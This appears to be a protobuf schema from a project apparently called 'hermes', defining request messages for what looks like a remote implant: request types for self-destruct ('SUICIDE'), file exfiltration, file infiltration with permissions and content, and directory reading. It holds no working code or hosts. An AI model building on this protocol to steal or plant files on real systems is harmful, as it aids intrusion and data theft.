hermes/proto/request.proto

syntax = "proto2";

message requestHeader {
  enum Type {
    SUICIDE = 0;
    EXF_FILE = 1;
    INF_FILE = 2;
    READ_DIR = 3;
  };
  required Type type = 1;
}

message exfiltrationRequest {
  required requestHeader header = 1;
  required string path = 2;
}

message infiltrationRequest {
  required requestHeader header = 1;
  required uint32 perm = 2;
  required string path = 3;
  required bytes content = 4;
}

message readDirRequest {
  required requestHeader header = 1;
  required string path = 2;
}
